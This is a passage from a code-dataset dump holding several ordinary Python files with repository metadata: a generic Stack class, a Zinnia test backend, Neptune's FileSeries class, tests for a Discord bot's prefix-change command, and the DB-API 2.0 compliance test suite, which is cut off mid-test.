] | null | null | null |
from typing import Generic, TypeVar, List, Optional
T = TypeVar('T')
class Stack(Generic[T]):
def __init__(self):
self.items: List[T] = []
def empty(self) -> bool:
return len(self.items) == 0
def push(self, item: T):
self.items.append(item)
def pop(self) -> T:
return self.items.pop()
def peek(self, default: Optional[T] = None) -> Optional[T]:
if len(self.items) > 0:
return self.items[-1]
return default
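# A minimal usage sketch: the stack is LIFO, and peek() returns the supplied
# default instead of raising when the stack is empty.
if __name__ == '__main__':
    s: Stack[int] = Stack()
    assert s.empty() and s.peek(-1) == -1
    s.push(1)
    s.push(2)
    assert s.peek() == 2
    assert s.pop() == 2 and s.pop() == 1
    assert s.empty()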
| 19.8
| 63
| 0.567677
|
from typing import Generic, TypeVar, List, Optional
T = TypeVar('T')
class Stack(Generic[T]):
def __init__(self):
self.items: List[T] = []
def empty(self) -> bool:
return len(self.items) == 0
def push(self, item: T):
self.items.append(item)
def pop(self) -> T:
return self.items.pop()
def peek(self, default: Optional[T] = None) -> Optional[T]:
if len(self.items) > 0:
return self.items[-1]
return default
| true
| true
|
f707bf37626295dfe090a7a114f70e0c595e03b1
| 272
|
py
|
Python
|
zinnia/tests/implementations/custom_url_shortener.py
|
Boondockers-Welcome/django-blog-zinnia
|
34aa1e7304f6686c61da81fbd93d082e5cd3144b
|
[
"BSD-3-Clause"
] | 1,522
|
2015-01-02T05:54:02.000Z
|
2022-03-31T04:13:14.000Z
|
zinnia/tests/implementations/custom_url_shortener.py
|
Boondockers-Welcome/django-blog-zinnia
|
34aa1e7304f6686c61da81fbd93d082e5cd3144b
|
[
"BSD-3-Clause"
] | 205
|
2015-01-02T19:29:37.000Z
|
2022-03-11T23:19:49.000Z
|
zinnia/tests/implementations/custom_url_shortener.py
|
Boondockers-Welcome/django-blog-zinnia
|
34aa1e7304f6686c61da81fbd93d082e5cd3144b
|
[
"BSD-3-Clause"
] | 632
|
2015-01-02T05:54:02.000Z
|
2022-03-25T17:07:32.000Z
|
"""Custom url shortener backend for testing Zinnia"""
from django.core.exceptions import ImproperlyConfigured
# Raised at import time: loading this backend must always fail, which lets the
# test suite exercise Zinnia's handling of a misconfigured shortener setting.
raise ImproperlyConfigured('This backend only exists for testing')
def backend(entry):
"""Custom url shortener backend for testing Zinnia"""
return ''
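# For contrast, a working shortener backend is just an importable module that
# exposes backend(entry) returning the short URL. A minimal sketch under that
# contract (hypothetical example, never reached here because of the raise):
def example_backend(entry):
    # Assumes `entry` is a Django model instance with a primary key.
    return 'http://short.example/%s' % entry.pk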
| 27.2
| 66
| 0.768382
|
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured('This backend only exists for testing')
def backend(entry):
return ''
| true
| true
|
f707bfbef627ade68ba3332bb3383f70ec53f6b8
| 4,069
|
py
|
Python
|
neptune/new/attributes/series/file_series.py
|
Raalsky/neptune-client
|
24ac58581774e61056d49cd1a22727799c14ad54
|
[
"Apache-2.0"
] | 254
|
2020-01-27T14:18:57.000Z
|
2022-03-31T21:40:33.000Z
|
neptune/new/attributes/series/file_series.py
|
Raalsky/neptune-client
|
24ac58581774e61056d49cd1a22727799c14ad54
|
[
"Apache-2.0"
] | 160
|
2020-02-05T11:00:22.000Z
|
2022-03-31T08:50:24.000Z
|
neptune/new/attributes/series/file_series.py
|
Raalsky/neptune-client
|
24ac58581774e61056d49cd1a22727799c14ad54
|
[
"Apache-2.0"
] | 23
|
2020-02-07T09:19:50.000Z
|
2022-02-15T09:52:56.000Z
|
#
# Copyright (c) 2020, Neptune Labs Sp. z o.o.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import imghdr
import os
import pathlib
from typing import List, Optional, Iterable
from neptune.new.internal.utils import base64_encode
from neptune.new.exceptions import FileNotFound, OperationNotSupported
from neptune.new.types import File
from neptune.new.types.series.file_series import FileSeries as FileSeriesVal
from neptune.new.internal.operation import (
ImageValue,
LogImages,
ClearImageLog,
Operation,
)
from neptune.new.attributes.series.series import Series
from neptune.utils import split_to_chunks
Val = FileSeriesVal
Data = File
class FileSeries(Series[Val, Data]):
def _get_log_operations_from_value(
self, value: Val, step: Optional[float], timestamp: float
) -> List[Operation]:
values = [
LogImages.ValueType(
ImageValue(
data=self._get_base64_image_content(val),
name=value.name,
description=value.description,
),
step=step,
ts=timestamp,
)
for val in value.values
]
return [LogImages(self._path, chunk) for chunk in split_to_chunks(values, 1)]
def _get_clear_operation(self) -> Operation:
return ClearImageLog(self._path)
def _data_to_value(self, values: Iterable, **kwargs) -> Val:
return FileSeriesVal(values, **kwargs)
def _is_value_type(self, value) -> bool:
return isinstance(value, FileSeriesVal)
@staticmethod
def _get_base64_image_content(file: File) -> str:
if file.path is not None:
if not os.path.exists(file.path):
raise FileNotFound(file.path)
with open(file.path, "rb") as image_file:
file = File.from_stream(image_file)
        # Sniff the image type from the raw bytes; non-image content is rejected.
        ext = imghdr.what("", h=file.content)
if not ext:
raise OperationNotSupported(
"FileSeries supports only image files for now. "
"Other file types will be implemented in future."
)
return base64_encode(file.content)
def download(self, destination: Optional[str]):
target_dir = self._get_destination(destination)
item_count = self._backend.get_image_series_values(
self._container_id, self._container_type, self._path, 0, 1
).totalItemCount
for i in range(0, item_count):
self._backend.download_file_series_by_index(
self._container_id, self._container_type, self._path, i, target_dir
)
def download_last(self, destination: Optional[str]):
target_dir = self._get_destination(destination)
item_count = self._backend.get_image_series_values(
self._container_id, self._container_type, self._path, 0, 1
).totalItemCount
if item_count > 0:
self._backend.download_file_series_by_index(
self._container_id,
self._container_type,
self._path,
item_count - 1,
target_dir,
)
else:
raise ValueError("Unable to download last file - series is empty")
def _get_destination(self, destination: Optional[str]):
target_dir = destination
if destination is None:
target_dir = os.path.join("neptune", self._path[-1])
pathlib.Path(os.path.abspath(target_dir)).mkdir(parents=True, exist_ok=True)
return target_dir
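# A minimal sketch of the chunking behaviour assumed above (the semantics of
# neptune.utils.split_to_chunks as used here, not its actual implementation):
# with a chunk size of 1, every logged image becomes its own LogImages op.
def _split_to_chunks_sketch(values, chunk_size):
    for i in range(0, len(values), chunk_size):
        yield values[i:i + chunk_size]
# list(_split_to_chunks_sketch(['a', 'b', 'c'], 1)) == [['a'], ['b'], ['c']]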
| 34.777778
| 85
| 0.65102
|
import imghdr
import os
import pathlib
from typing import List, Optional, Iterable
from neptune.new.internal.utils import base64_encode
from neptune.new.exceptions import FileNotFound, OperationNotSupported
from neptune.new.types import File
from neptune.new.types.series.file_series import FileSeries as FileSeriesVal
from neptune.new.internal.operation import (
ImageValue,
LogImages,
ClearImageLog,
Operation,
)
from neptune.new.attributes.series.series import Series
from neptune.utils import split_to_chunks
Val = FileSeriesVal
Data = File
class FileSeries(Series[Val, Data]):
def _get_log_operations_from_value(
self, value: Val, step: Optional[float], timestamp: float
) -> List[Operation]:
values = [
LogImages.ValueType(
ImageValue(
data=self._get_base64_image_content(val),
name=value.name,
description=value.description,
),
step=step,
ts=timestamp,
)
for val in value.values
]
return [LogImages(self._path, chunk) for chunk in split_to_chunks(values, 1)]
def _get_clear_operation(self) -> Operation:
return ClearImageLog(self._path)
def _data_to_value(self, values: Iterable, **kwargs) -> Val:
return FileSeriesVal(values, **kwargs)
def _is_value_type(self, value) -> bool:
return isinstance(value, FileSeriesVal)
@staticmethod
def _get_base64_image_content(file: File) -> str:
if file.path is not None:
if not os.path.exists(file.path):
raise FileNotFound(file.path)
with open(file.path, "rb") as image_file:
file = File.from_stream(image_file)
ext = imghdr.what("", h=file.content)
if not ext:
raise OperationNotSupported(
"FileSeries supports only image files for now. "
"Other file types will be implemented in future."
)
return base64_encode(file.content)
def download(self, destination: Optional[str]):
target_dir = self._get_destination(destination)
item_count = self._backend.get_image_series_values(
self._container_id, self._container_type, self._path, 0, 1
).totalItemCount
for i in range(0, item_count):
self._backend.download_file_series_by_index(
self._container_id, self._container_type, self._path, i, target_dir
)
def download_last(self, destination: Optional[str]):
target_dir = self._get_destination(destination)
item_count = self._backend.get_image_series_values(
self._container_id, self._container_type, self._path, 0, 1
).totalItemCount
if item_count > 0:
self._backend.download_file_series_by_index(
self._container_id,
self._container_type,
self._path,
item_count - 1,
target_dir,
)
else:
raise ValueError("Unable to download last file - series is empty")
def _get_destination(self, destination: Optional[str]):
target_dir = destination
if destination is None:
target_dir = os.path.join("neptune", self._path[-1])
pathlib.Path(os.path.abspath(target_dir)).mkdir(parents=True, exist_ok=True)
return target_dir
| true
| true
|
f707c07871c15298e2d268bba3388571e000b0b5
| 3,266
|
py
|
Python
|
tests/commands/test_changeprefixcommand.py
|
matthew-robertson/banned-word-tracker
|
32defe7936114258325ef8ba2f740648d43d4abf
|
[
"MIT"
] | 11
|
2019-03-10T18:31:59.000Z
|
2021-02-13T12:42:44.000Z
|
tests/commands/test_changeprefixcommand.py
|
matthew-robertson/banned-word-tracker
|
32defe7936114258325ef8ba2f740648d43d4abf
|
[
"MIT"
] | 51
|
2019-02-21T21:21:59.000Z
|
2022-03-09T01:29:55.000Z
|
tests/commands/test_changeprefixcommand.py
|
matthew-robertson/vore-tracker
|
c35807612397ae7bc540cb0a1af6bf3ec1f98593
|
[
"MIT"
] | 5
|
2018-07-12T06:36:29.000Z
|
2019-01-09T04:11:19.000Z
|
import unittest
from unittest.mock import patch, Mock
import discord
import datetime
from commands import ChangePrefixCommand
from serverobjects.server import DiscordServer
class TestChangePrefixCommand(unittest.TestCase):
def setUp(self):
self.command = ChangePrefixCommand()
self.time = datetime.datetime.now()
self.server_json = {
'server_id' : 1,
'awake' : True,
'timeout_duration_seconds': 1800,
'prefix': '!vt',
'banned_words': [{
'rowid': 1,
'server_id': 1,
'banned_word': 'vore',
'infracted_at': (self.time - datetime.timedelta(minutes=20)).strftime("%Y-%m-%d %H:%M:%S"),
'calledout_at': (self.time - datetime.timedelta(minutes=20)).strftime("%Y-%m-%d %H:%M:%S"),
'record': {
'record_seconds': 2400,
'infraction_count': 0
}
}]
}
def test_is_command_authorized__no_permissions_disallowed(self):
result = self.command.is_command_authorized()
self.assertFalse(result)
def test_is_command_authorized__non_admin_disallowed(self):
permissions = discord.Permissions()
result = self.command.is_command_authorized(permissions)
self.assertFalse(result)
def test_is_command_authorized__admin_allowed(self):
permissions = discord.Permissions.all()
result = self.command.is_command_authorized(permissions)
self.assertTrue(result)
@patch('serverobjects.server.DiscordServer.update_server_settings')
def test_execute__change_full_time_valid(self, prefix_patch):
message = Mock(**{
'server': Mock(**{
'id': 1
}),
'content': "!vtprefix !testin",
'author': Mock(**{
'id': 2,
'mention': "@test",
'bot': False
}),
})
server = DiscordServer(self.server_json, self.time, None)
retval = self.command.execute(server, self.time, message.content, message.author)
prefix_patch.assert_called_with({ 'prefix': '!testin' })
self.assertEqual(
retval,
"Cool, from now on you'll need to start a message with '!testin' for me to treat it as a command."
)
self.assertTrue(prefix_patch.called)
@patch('serverobjects.server.DiscordServer.update_server_settings')
def test_execute__change_prefix_too_long(self, prefix_patch):
prefix_patch.return_value = False
message = Mock(**{
'server': Mock(**{
'id': 1
}),
'content': "!vtprefix asdfasdfasdf",
'author': Mock(**{
'id': 2,
'mention': "@test",
'bot': False
}),
})
server = DiscordServer(self.server_json, self.time, None)
retval = self.command.execute(server, self.time, message.content, message.author)
self.assertEqual(
retval,
"Sorry, I don't understand that formatting. I was expecting a new prefix between 1 and 10 characters long."
)
@patch('serverobjects.server.DiscordServer.update_server_settings')
def test_execute__change_no_time_invalid(self, prefix_patch):
message = Mock(**{
'server': Mock(**{
'id': 1
}),
'content': "!vtprefix",
'author': Mock(**{
'id': 2,
'mention': "@test",
'bot': False
}),
})
server = DiscordServer(self.server_json, self.time, None)
self.command.execute(server, self.time, message.content, message.author)
self.assertFalse(prefix_patch.called)
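# The suite can be run directly; a standard entry-point sketch (assumes the
# commands and serverobjects packages are importable from the working dir):
if __name__ == '__main__':
    unittest.main()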
| 31.403846
| 110
| 0.671464
|
import unittest
from unittest.mock import patch, Mock
import discord
import datetime
from commands import ChangePrefixCommand
from serverobjects.server import DiscordServer
class TestChangePrefixCommand(unittest.TestCase):
def setUp(self):
self.command = ChangePrefixCommand()
self.time = datetime.datetime.now()
self.server_json = {
'server_id' : 1,
'awake' : True,
'timeout_duration_seconds': 1800,
'prefix': '!vt',
'banned_words': [{
'rowid': 1,
'server_id': 1,
'banned_word': 'vore',
'infracted_at': (self.time - datetime.timedelta(minutes=20)).strftime("%Y-%m-%d %H:%M:%S"),
'calledout_at': (self.time - datetime.timedelta(minutes=20)).strftime("%Y-%m-%d %H:%M:%S"),
'record': {
'record_seconds': 2400,
'infraction_count': 0
}
}]
}
def test_is_command_authorized__no_permissions_disallowed(self):
result = self.command.is_command_authorized()
self.assertFalse(result)
def test_is_command_authorized__non_admin_disallowed(self):
permissions = discord.Permissions()
result = self.command.is_command_authorized(permissions)
self.assertFalse(result)
def test_is_command_authorized__admin_allowed(self):
permissions = discord.Permissions.all()
result = self.command.is_command_authorized(permissions)
self.assertTrue(result)
@patch('serverobjects.server.DiscordServer.update_server_settings')
def test_execute__change_full_time_valid(self, prefix_patch):
message = Mock(**{
'server': Mock(**{
'id': 1
}),
'content': "!vtprefix !testin",
'author': Mock(**{
'id': 2,
'mention': "@test",
'bot': False
}),
})
server = DiscordServer(self.server_json, self.time, None)
retval = self.command.execute(server, self.time, message.content, message.author)
prefix_patch.assert_called_with({ 'prefix': '!testin' })
self.assertEqual(
retval,
"Cool, from now on you'll need to start a message with '!testin' for me to treat it as a command."
)
self.assertTrue(prefix_patch.called)
@patch('serverobjects.server.DiscordServer.update_server_settings')
def test_execute__change_prefix_too_long(self, prefix_patch):
prefix_patch.return_value = False
message = Mock(**{
'server': Mock(**{
'id': 1
}),
'content': "!vtprefix asdfasdfasdf",
'author': Mock(**{
'id': 2,
'mention': "@test",
'bot': False
}),
})
server = DiscordServer(self.server_json, self.time, None)
retval = self.command.execute(server, self.time, message.content, message.author)
self.assertEqual(
retval,
"Sorry, I don't understand that formatting. I was expecting a new prefix between 1 and 10 characters long."
)
@patch('serverobjects.server.DiscordServer.update_server_settings')
def test_execute__change_no_time_invalid(self, prefix_patch):
message = Mock(**{
'server': Mock(**{
'id': 1
}),
'content': "!vtprefix",
'author': Mock(**{
'id': 2,
'mention': "@test",
'bot': False
}),
})
server = DiscordServer(self.server_json, self.time, None)
self.command.execute(server, self.time, message.content, message.author)
self.assertFalse(prefix_patch.called)
| true
| true
|
f707c090c7c47b564eeb606a924569db3db76f3e
| 32,286
|
py
|
Python
|
StackApp/env/lib/python2.7/site-packages/psycopg2/tests/dbapi20.py
|
jonathanmusila/StackOverflow-Lite
|
a9a03f129592c6f741eb4d1e608ca2db0e40bf11
|
[
"MIT"
] | 34
|
2016-09-30T17:17:58.000Z
|
2022-02-04T15:53:09.000Z
|
StackApp/env/lib/python2.7/site-packages/psycopg2/tests/dbapi20.py
|
jonathanmusila/StackOverflow-Lite
|
a9a03f129592c6f741eb4d1e608ca2db0e40bf11
|
[
"MIT"
] | 23
|
2016-07-21T17:51:07.000Z
|
2018-11-29T15:09:06.000Z
|
StackApp/env/lib/python2.7/site-packages/psycopg2/tests/dbapi20.py
|
jonathanmusila/StackOverflow-Lite
|
a9a03f129592c6f741eb4d1e608ca2db0e40bf11
|
[
"MIT"
] | 18
|
2016-09-30T17:44:05.000Z
|
2021-12-23T07:55:11.000Z
|
#!/usr/bin/env python
''' Python DB API 2.0 driver compliance unit test suite.
This software is Public Domain and may be used without restrictions.
"Now we have booze and barflies entering the discussion, plus rumours of
DBAs on drugs... and I won't tell you what flashes through my mind each
time I read the subject line with 'Anal Compliance' in it. All around
this is turning out to be a thoroughly unwholesome unit test."
-- Ian Bicking
'''
__rcs_id__ = '$Id: dbapi20.py,v 1.11 2005/01/02 02:41:01 zenzen Exp $'
__version__ = '$Revision: 1.12 $'[11:-2]
__author__ = 'Stuart Bishop <stuart@stuartbishop.net>'
import unittest
import time
import sys
# Revision 1.12 2009/02/06 03:35:11 kf7xm
# Tested okay with Python 3.0, includes last minute patches from Mark H.
#
# Revision 1.1.1.1.2.1 2008/09/20 19:54:59 rupole
# Include latest changes from main branch
# Updates for py3k
#
# Revision 1.11 2005/01/02 02:41:01 zenzen
# Update author email address
#
# Revision 1.10 2003/10/09 03:14:14 zenzen
# Add test for DB API 2.0 optional extension, where database exceptions
# are exposed as attributes on the Connection object.
#
# Revision 1.9 2003/08/13 01:16:36 zenzen
# Minor tweak from Stefan Fleiter
#
# Revision 1.8 2003/04/10 00:13:25 zenzen
# Changes, as per suggestions by M.-A. Lemburg
# - Add a table prefix, to ensure namespace collisions can always be avoided
#
# Revision 1.7 2003/02/26 23:33:37 zenzen
# Break out DDL into helper functions, as per request by David Rushby
#
# Revision 1.6 2003/02/21 03:04:33 zenzen
# Stuff from Henrik Ekelund:
# added test_None
# added test_nextset & hooks
#
# Revision 1.5 2003/02/17 22:08:43 zenzen
# Implement suggestions and code from Henrik Eklund - test that cursor.arraysize
# defaults to 1 & generic cursor.callproc test added
#
# Revision 1.4 2003/02/15 00:16:33 zenzen
# Changes, as per suggestions and bug reports by M.-A. Lemburg,
# Matthew T. Kromer, Federico Di Gregorio and Daniel Dittmar
# - Class renamed
# - Now a subclass of TestCase, to avoid requiring the driver stub
# to use multiple inheritance
# - Reversed the polarity of buggy test in test_description
# - Test exception hierarchy correctly
# - self.populate is now self._populate(), so if a driver stub
# overrides self.ddl1 this change propagates
# - VARCHAR columns now have a width, which will hopefully make the
# DDL even more portable (this will be reversed if it causes more problems)
# - cursor.rowcount being checked after various execute and fetchXXX methods
# - Check for fetchall and fetchmany returning empty lists after results
# are exhausted (already checking for empty lists if select retrieved
# nothing)
# - Fix bugs in test_setoutputsize_basic and test_setinputsizes
#
def str2bytes(sval):
if sys.version_info < (3,0) and isinstance(sval, str):
sval = sval.decode("latin1")
return sval.encode("latin1")
class DatabaseAPI20Test(unittest.TestCase):
''' Test a database self.driver for DB API 2.0 compatibility.
This implementation tests Gadfly, but the TestCase
        is structured so that other drivers can subclass this
        test case to ensure compliance with the DB-API. It is
expected that this TestCase may be expanded in the future
if ambiguities or edge conditions are discovered.
The 'Optional Extensions' are not yet being tested.
        Drivers should subclass this test, overriding setUp, tearDown,
self.driver, connect_args and connect_kw_args. Class specification
should be as follows:
import dbapi20
class mytest(dbapi20.DatabaseAPI20Test):
[...]
Don't 'import DatabaseAPI20Test from dbapi20', or you will
confuse the unit tester - just 'import dbapi20'.
'''
# The self.driver module. This should be the module where the 'connect'
# method is to be found
driver = None
connect_args = () # List of arguments to pass to connect
connect_kw_args = {} # Keyword arguments for connect
table_prefix = 'dbapi20test_' # If you need to specify a prefix for tables
ddl1 = 'create table %sbooze (name varchar(20))' % table_prefix
ddl2 = 'create table %sbarflys (name varchar(20))' % table_prefix
xddl1 = 'drop table %sbooze' % table_prefix
xddl2 = 'drop table %sbarflys' % table_prefix
lowerfunc = 'lower' # Name of stored procedure to convert string->lowercase
# Some drivers may need to override these helpers, for example adding
# a 'commit' after the execute.
def executeDDL1(self,cursor):
cursor.execute(self.ddl1)
def executeDDL2(self,cursor):
cursor.execute(self.ddl2)
def setUp(self):
        ''' Drivers should override this method to perform required setup
if any is necessary, such as creating the database.
'''
pass
def tearDown(self):
        ''' Drivers should override this method to perform required cleanup
if any is necessary, such as deleting the test database.
The default drops the tables that may be created.
'''
con = self._connect()
try:
cur = con.cursor()
for ddl in (self.xddl1,self.xddl2):
try:
cur.execute(ddl)
con.commit()
except self.driver.Error:
# Assume table didn't exist. Other tests will check if
# execute is busted.
pass
finally:
con.close()
def _connect(self):
try:
return self.driver.connect(
*self.connect_args,**self.connect_kw_args
)
except AttributeError:
self.fail("No connect method found in self.driver module")
def test_connect(self):
con = self._connect()
con.close()
def test_apilevel(self):
try:
# Must exist
apilevel = self.driver.apilevel
# Must equal 2.0
self.assertEqual(apilevel,'2.0')
except AttributeError:
self.fail("Driver doesn't define apilevel")
def test_threadsafety(self):
try:
# Must exist
threadsafety = self.driver.threadsafety
# Must be a valid value
self.failUnless(threadsafety in (0,1,2,3))
except AttributeError:
self.fail("Driver doesn't define threadsafety")
def test_paramstyle(self):
try:
# Must exist
paramstyle = self.driver.paramstyle
# Must be a valid value
self.failUnless(paramstyle in (
'qmark','numeric','named','format','pyformat'
))
except AttributeError:
self.fail("Driver doesn't define paramstyle")
def test_Exceptions(self):
# Make sure required exceptions exist, and are in the
# defined hierarchy.
        if sys.version[0] == '3': # under Python 3 StandardError no longer exists
self.failUnless(issubclass(self.driver.Warning,Exception))
self.failUnless(issubclass(self.driver.Error,Exception))
else:
self.failUnless(issubclass(self.driver.Warning,StandardError))
self.failUnless(issubclass(self.driver.Error,StandardError))
self.failUnless(
issubclass(self.driver.InterfaceError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.DatabaseError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.OperationalError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.IntegrityError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.InternalError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.ProgrammingError,self.driver.Error)
)
self.failUnless(
issubclass(self.driver.NotSupportedError,self.driver.Error)
)
def test_ExceptionsAsConnectionAttributes(self):
# OPTIONAL EXTENSION
# Test for the optional DB API 2.0 extension, where the exceptions
# are exposed as attributes on the Connection object
# I figure this optional extension will be implemented by any
# driver author who is using this test suite, so it is enabled
# by default.
con = self._connect()
drv = self.driver
self.failUnless(con.Warning is drv.Warning)
self.failUnless(con.Error is drv.Error)
self.failUnless(con.InterfaceError is drv.InterfaceError)
self.failUnless(con.DatabaseError is drv.DatabaseError)
self.failUnless(con.OperationalError is drv.OperationalError)
self.failUnless(con.IntegrityError is drv.IntegrityError)
self.failUnless(con.InternalError is drv.InternalError)
self.failUnless(con.ProgrammingError is drv.ProgrammingError)
self.failUnless(con.NotSupportedError is drv.NotSupportedError)
def test_commit(self):
con = self._connect()
try:
# Commit must work, even if it doesn't do anything
con.commit()
finally:
con.close()
def test_rollback(self):
con = self._connect()
# If rollback is defined, it should either work or throw
# the documented exception
if hasattr(con,'rollback'):
try:
con.rollback()
except self.driver.NotSupportedError:
pass
def test_cursor(self):
con = self._connect()
try:
cur = con.cursor()
finally:
con.close()
def test_cursor_isolation(self):
con = self._connect()
try:
# Make sure cursors created from the same connection have
# the documented transaction isolation level
cur1 = con.cursor()
cur2 = con.cursor()
self.executeDDL1(cur1)
cur1.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
cur2.execute("select name from %sbooze" % self.table_prefix)
booze = cur2.fetchall()
self.assertEqual(len(booze),1)
self.assertEqual(len(booze[0]),1)
self.assertEqual(booze[0][0],'Victoria Bitter')
finally:
con.close()
def test_description(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
self.assertEqual(cur.description,None,
'cursor.description should be none after executing a '
'statement that can return no rows (such as DDL)'
)
cur.execute('select name from %sbooze' % self.table_prefix)
self.assertEqual(len(cur.description),1,
'cursor.description describes too many columns'
)
self.assertEqual(len(cur.description[0]),7,
'cursor.description[x] tuples must have 7 elements'
)
self.assertEqual(cur.description[0][0].lower(),'name',
'cursor.description[x][0] must return column name'
)
self.assertEqual(cur.description[0][1],self.driver.STRING,
'cursor.description[x][1] must return column type. Got %r'
% cur.description[0][1]
)
# Make sure self.description gets reset
self.executeDDL2(cur)
self.assertEqual(cur.description,None,
'cursor.description not being set to None when executing '
'no-result statements (eg. DDL)'
)
finally:
con.close()
def test_rowcount(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
self.assertEqual(cur.rowcount,-1,
'cursor.rowcount should be -1 after executing no-result '
'statements'
)
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.failUnless(cur.rowcount in (-1,1),
                'cursor.rowcount should == number of rows inserted, or '
'set to -1 after executing an insert statement'
)
cur.execute("select name from %sbooze" % self.table_prefix)
self.failUnless(cur.rowcount in (-1,1),
'cursor.rowcount should == number of rows returned, or '
'set to -1 after executing a select statement'
)
self.executeDDL2(cur)
self.assertEqual(cur.rowcount,-1,
'cursor.rowcount not being reset to -1 after executing '
'no-result statements'
)
finally:
con.close()
lower_func = 'lower'
def test_callproc(self):
con = self._connect()
try:
cur = con.cursor()
if self.lower_func and hasattr(cur,'callproc'):
r = cur.callproc(self.lower_func,('FOO',))
self.assertEqual(len(r),1)
self.assertEqual(r[0],'FOO')
r = cur.fetchall()
self.assertEqual(len(r),1,'callproc produced no result set')
self.assertEqual(len(r[0]),1,
'callproc produced invalid result set'
)
self.assertEqual(r[0][0],'foo',
'callproc produced invalid results'
)
finally:
con.close()
def test_close(self):
con = self._connect()
try:
cur = con.cursor()
finally:
con.close()
# cursor.execute should raise an Error if called after connection
# closed
self.assertRaises(self.driver.Error,self.executeDDL1,cur)
        # connection.commit should raise an Error if called after connection
        # closed.
self.assertRaises(self.driver.Error,con.commit)
# connection.close should raise an Error if called more than once
# Issue discussed on DB-SIG: consensus seem that close() should not
# raised if called on closed objects. Issue reported back to Stuart.
# self.assertRaises(self.driver.Error,con.close)
def test_execute(self):
con = self._connect()
try:
cur = con.cursor()
self._paraminsert(cur)
finally:
con.close()
def _paraminsert(self,cur):
self.executeDDL1(cur)
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.failUnless(cur.rowcount in (-1,1))
if self.driver.paramstyle == 'qmark':
cur.execute(
'insert into %sbooze values (?)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'numeric':
cur.execute(
'insert into %sbooze values (:1)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'named':
cur.execute(
'insert into %sbooze values (:beer)' % self.table_prefix,
{'beer':"Cooper's"}
)
elif self.driver.paramstyle == 'format':
cur.execute(
'insert into %sbooze values (%%s)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'pyformat':
cur.execute(
'insert into %sbooze values (%%(beer)s)' % self.table_prefix,
{'beer':"Cooper's"}
)
else:
self.fail('Invalid paramstyle')
self.failUnless(cur.rowcount in (-1,1))
cur.execute('select name from %sbooze' % self.table_prefix)
res = cur.fetchall()
self.assertEqual(len(res),2,'cursor.fetchall returned too few rows')
beers = [res[0][0],res[1][0]]
beers.sort()
self.assertEqual(beers[0],"Cooper's",
'cursor.fetchall retrieved incorrect data, or data inserted '
'incorrectly'
)
self.assertEqual(beers[1],"Victoria Bitter",
'cursor.fetchall retrieved incorrect data, or data inserted '
'incorrectly'
)
def test_executemany(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
largs = [ ("Cooper's",) , ("Boag's",) ]
margs = [ {'beer': "Cooper's"}, {'beer': "Boag's"} ]
if self.driver.paramstyle == 'qmark':
cur.executemany(
'insert into %sbooze values (?)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'numeric':
cur.executemany(
'insert into %sbooze values (:1)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'named':
cur.executemany(
'insert into %sbooze values (:beer)' % self.table_prefix,
margs
)
elif self.driver.paramstyle == 'format':
cur.executemany(
'insert into %sbooze values (%%s)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'pyformat':
cur.executemany(
'insert into %sbooze values (%%(beer)s)' % (
self.table_prefix
),
margs
)
else:
self.fail('Unknown paramstyle')
self.failUnless(cur.rowcount in (-1,2),
'insert using cursor.executemany set cursor.rowcount to '
'incorrect value %r' % cur.rowcount
)
cur.execute('select name from %sbooze' % self.table_prefix)
res = cur.fetchall()
self.assertEqual(len(res),2,
'cursor.fetchall retrieved incorrect number of rows'
)
beers = [res[0][0],res[1][0]]
beers.sort()
self.assertEqual(beers[0],"Boag's",'incorrect data retrieved')
self.assertEqual(beers[1],"Cooper's",'incorrect data retrieved')
finally:
con.close()
def test_fetchone(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchone should raise an Error if called before
# executing a select-type query
self.assertRaises(self.driver.Error,cur.fetchone)
# cursor.fetchone should raise an Error if called after
# executing a query that cannot return rows
self.executeDDL1(cur)
self.assertRaises(self.driver.Error,cur.fetchone)
cur.execute('select name from %sbooze' % self.table_prefix)
self.assertEqual(cur.fetchone(),None,
'cursor.fetchone should return None if a query retrieves '
'no rows'
)
self.failUnless(cur.rowcount in (-1,0))
# cursor.fetchone should raise an Error if called after
# executing a query that cannot return rows
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.assertRaises(self.driver.Error,cur.fetchone)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchone()
self.assertEqual(len(r),1,
'cursor.fetchone should have retrieved a single row'
)
self.assertEqual(r[0],'Victoria Bitter',
'cursor.fetchone retrieved incorrect data'
)
self.assertEqual(cur.fetchone(),None,
'cursor.fetchone should return None if no more rows available'
)
self.failUnless(cur.rowcount in (-1,1))
finally:
con.close()
samples = [
'Carlton Cold',
'Carlton Draft',
'Mountain Goat',
'Redback',
'Victoria Bitter',
'XXXX'
]
def _populate(self):
''' Return a list of sql commands to setup the DB for the fetch
tests.
'''
populate = [
"insert into %sbooze values ('%s')" % (self.table_prefix,s)
for s in self.samples
]
return populate
def test_fetchmany(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchmany should raise an Error if called without
            # issuing a query
self.assertRaises(self.driver.Error,cur.fetchmany,4)
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
